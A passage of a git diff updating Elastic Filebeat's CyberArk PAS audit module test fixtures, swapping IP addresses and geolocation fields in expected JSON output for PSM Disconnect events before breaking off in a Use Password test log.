+        "log.offset": 31414,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1013,24 +946,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -1055,23 +985,18 @@
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_duration": "00:00:05",
         "cyberarkpas.audit.extra_details.session_id": "692fe25f-f940-4170-8ea4-5241b35173f0",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:18:36Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:18:36</Timestamp>\n    <IsoTimestamp>2021-03-15T13:18:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:18:36</Timestamp>\n    <IsoTimestamp>2021-03-15T13:18:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 06:18:36",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm disconnect",
@@ -1093,7 +1018,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 34514,
+        "log.offset": 34472,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1103,24 +1028,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "adrian"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -1145,23 +1067,18 @@
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_duration": "00:00:06",
         "cyberarkpas.audit.extra_details.session_id": "f5725611-ca57-4a2a-a089-f45b3174a358",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:11Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:11</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:11</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 07:08:11",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm disconnect",
@@ -1183,7 +1100,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 37110,
+        "log.offset": 37062,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1193,24 +1110,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "adrian"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -1243,23 +1157,18 @@
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_duration": "00:00:09",
         "cyberarkpas.audit.extra_details.session_id": "7db90436-8a1a-4203-9a96-65137625ab2d",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:36Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:36</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:36</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 07:08:36",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm disconnect",
@@ -1281,7 +1190,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 39706,
+        "log.offset": 39652,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1291,24 +1200,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -1341,23 +1247,18 @@
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_duration": "00:49:12",
         "cyberarkpas.audit.extra_details.session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T15:00:21Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 08:00:21</Timestamp>\n    <IsoTimestamp>2021-03-15T15:00:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615819476\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 08:00:21</Timestamp>\n    <IsoTimestamp>2021-03-15T15:00:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615819476\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 08:00:21",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm disconnect",
@@ -1379,7 +1280,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 43552,
+        "log.offset": 43492,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -1389,24 +1290,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log
index 8c77aabf9097..bfb67998dd86 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/308_use_password.log
@@ -1,11 +1,11 @@
 {"format":"elastic","version":"1.0","raw":"<syslog>\n  <audit_record>\n    <Rfc5424>no</Rfc5424>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.6.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>adm2</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>Windows</Safe>\n    <File>Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2</File>\n    <Station>10.2.0.6</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>(Action: Connect)</Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>10.2.0.3</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WIN-SERVER-LOCAL\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"Administrator2\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"dbserver.cyberark.local\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"DBServer\"></CAProperty>\n      <CAProperty Name=\"SequenceID\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"LastSuccessReconciliation\" Value=\"1604944215\"></CAProperty>\n      <CAProperty Name=\"Customer\" Value=\"EvilCorp\"></CAProperty>\n   